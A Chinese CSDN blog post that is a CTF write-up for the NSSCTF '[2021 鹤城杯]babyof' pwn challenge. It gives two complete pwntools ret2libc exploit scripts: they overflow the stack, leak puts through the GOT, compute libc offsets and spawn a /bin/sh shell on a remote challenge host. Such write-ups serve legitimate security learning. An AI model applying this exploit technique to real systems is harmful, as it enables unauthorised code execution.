NSSCTF刷题笔记pwn10——[2021 鹤城杯]babyof

最新推荐文章于 2024-06-18 15:21:45 发布
最新推荐文章于 2024-06-18 15:21:45 发布
阅读量290 收藏
点赞数 2
分类专栏: pwn 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135999745
版权

朴实无华的栈溢出,没有system函数,也没有/bin/sh字符串,也没有给libc文件

但是我们有puts可以泄露数据

from pwn import *
from LibcSearcher import *
context(arch="amd64")
io = process('./babyof')
elf = ELF('./babyof')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

main_addr = 0x40066b
pop_rdi_ret = 0x400743
ret_addr = 0x400506


payload = flat([b'A'*0x48,pop_rdi_ret,puts_got,puts_plt,main_addr])
io.recvline()
io.sendline(payload)
io.recvuntil('I hope you win\n')
puts_addr = int(unpack(io.recvuntil('\n',drop=True).ljust(8,b'\x00')))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload2 = flat([b'A'*0x48,pop_rdi_ret,bin_sh,system_addr])
io.sendline(payload2)
io.interactive()

这是通过libcsearcher获取偏移的代码,可惜在这题好像行不通,但是思路是这样子的

通过泄露目标的函数地址,我可以确定目标使用的是这两个libc文件

libc database search (blukat.me)

然后是修改过后的代码,基本上没差

from pwn import *
from LibcSearcher import *
context(arch="amd64")
#io = process('./babyof')
io = remote('node4.anna.nssctf.cn',28711)
elf = ELF('./babyof')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
setvbuf = elf.got['setvbuf']

main_addr = 0x40066b
pop_rdi_ret = 0x400743
ret_addr = 0x400506


payload = flat([b'A'*0x48,pop_rdi_ret,puts_got,puts_plt,main_addr])
io.recvline()
io.sendline(payload)
io.recvuntil('I hope you win\n')
puts_addr = int(unpack(io.recvuntil('\n',drop=True).ljust(8,b'\x00')))
print(hex(puts_addr))

libc_puts = 0x80aa0
libc_base = puts_addr - libc_puts
system_addr = libc_base + 0x4f550
bin_sh = libc_base + 0x1b3e1a
payload2 = flat([b'A'*0x48,ret_addr,pop_rdi_ret,bin_sh,system_addr])
io.sendline(payload2)
io.interactive()

qq_45692883
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【PWN · ret2libc】[2021 鹤城]babyof
Mr_Fmnwon的博客
05-30 1672
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
[2021 鹤城]babyof(libc泄露)
m0_74355719的博客
11-29 444
【代码】[2021 鹤城]babyof(libc泄露)
[2021 鹤城]babyof全网最详细
qq_41937545的博客
10-13 324
[2021 鹤城]babyof全网最详细
首届“鹤城”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2514
首届“鹤城”河南·鹤壁CTF网络安全挑战赛WP
鹤城PWN几道题的writeup
10-09 552
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
NSSCTF刷题笔记pwn6——[NISACTF 2022]ezstack
qq_45692883的博客
02-02 222
这个shell会使用system函数打印一串内容,并且发现我们读入的数据大于buf的大小,存在栈溢出。栈溢出,system函数,/bin/sh字符串,那么万事已经具备了,开始写脚本。按下shift+12,在字符串界面找到/bin/sh。用ida打开,有一个shell函数。
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
强网2022 pwn 赛题解析.docx
12-18
【强网2022 Pwn赛题解析】 在网络安全竞赛“强网”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
首届"鹤城"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 1765
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
随心笔记,第六更
leen的博客
06-13 535
今天给大家分享的是使用idea 将xml转为JavaBean,并且取其中的数据和其他的数据进行交互。
Python学习笔记11 -- 细碎内容
m0_71291382的博客
06-12 258
记录一些琐碎点,包括如何注释、变量常量说明、字符串拼接的三种方法及转义字符的简单说明
MySQL数据库笔记(二)
2301_78671299的博客
06-18 638
操作数据对象。接受参数返回一个结果。只对一行进行变换。每行返回一个结果。可以嵌套。参数可以是一列或一个值。聚合函数作用于一组数据,并对一组数据返回一个值。子查询指一个查询语句嵌套在另一个查询语句内部的查询。多表查询,也称为关联查询,指两个或更多个表一起完成查询操作。前提条件:这些一起查询的表之间是有关系的(一对一、一对多),它们之间一定是有关联字段,这个关联字段可能建立外键,也可能没有建立外键。比如:员工表和部门表,这两个表依靠“部门编号”进行关联。
【虚幻5】自学纯蓝图笔记(一)
lklalmq的博客
06-16 596
笔记使用v15.17.1版本的IDE ,v5.4.2的引擎有许多小的功能记录在快捷键一节中,节省时间就不单独记录学习本章内容时的机器太差了,i58代的CPU,16g运存,所以GIF截图会非常卡顿指导老师:B站UP主-张亮002。
802.11漫游流程简单解析与笔记_Part3
Mr_liu_666的博客
06-10 253
看过Part1的应该都知道,标准关联流程是auth*2 associate*2 key*4,但ns3里面没有与auth有关的部分,third脚本里面有cap字段,但无auth也无key,所以part3是空的
GRIT论文阅读笔记
最新发布
read, note and comment papers
06-18 76
一篇试图统一生成任务和编码任务的工作,就是把只能完成生成任务的GPT改成既能生成又能encode。 思路其实很简单,就是在输入的时候添加instruction tokens来指引模型做representation还是generation,然后各自算损失。representation任务用的是document和query的对比学习。把最后一层的token给mean pooling(只对word tokens做,不对instruction做)出一个embedding算对比损失,做generation的时候就
软件安全实验二——pwn
09-12
你好!很高兴回答你的问题。关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来进行Pwn攻击。 缓冲区溢出是一种常见的Pwn攻击技术,它利用了程序在处理输入数据时没有正确限制长度的漏洞。通过向程序输入过长的数据,可以覆盖到程序运行时的内存空间中的其他重要数据,例如返回地址。通过修改返回地址,攻击者可以控制程序流程,执行恶意代码。 格式化字符串漏洞是另一种常见的Pwn攻击技术。它利用了C语言的格式化字符串函数(如printf、sprintf等)在处理格式化字符串时存在的安全问题。通过向程序输入特定格式的字符串,攻击者可以读取或修改内存中的数据,甚至执行任意代码。 堆溢出是利用堆内存管理中的漏洞进行攻击的一种技术。在使用动态分配内存时,如果没有正确地释放或管理内存,可能会导致堆溢出。通过在堆中溢出写入数据,攻击者可以修改关键数据结构,从而影响程序的执行逻辑。 以上只是Pwn攻击的一些基本概念,实际的Pwn攻击还涉及很多技术和细节。在进行任何Pwn攻击之前,请务必遵循法律和道德规范,并确保你在合法授权的环境中进行实验。 如果你有任何关于Pwn攻击或软件安全实验的具体问题,我会尽力为你解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值